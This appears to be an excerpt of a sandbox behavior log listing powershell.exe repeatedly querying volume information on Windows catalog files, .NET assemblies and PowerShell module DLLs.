        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
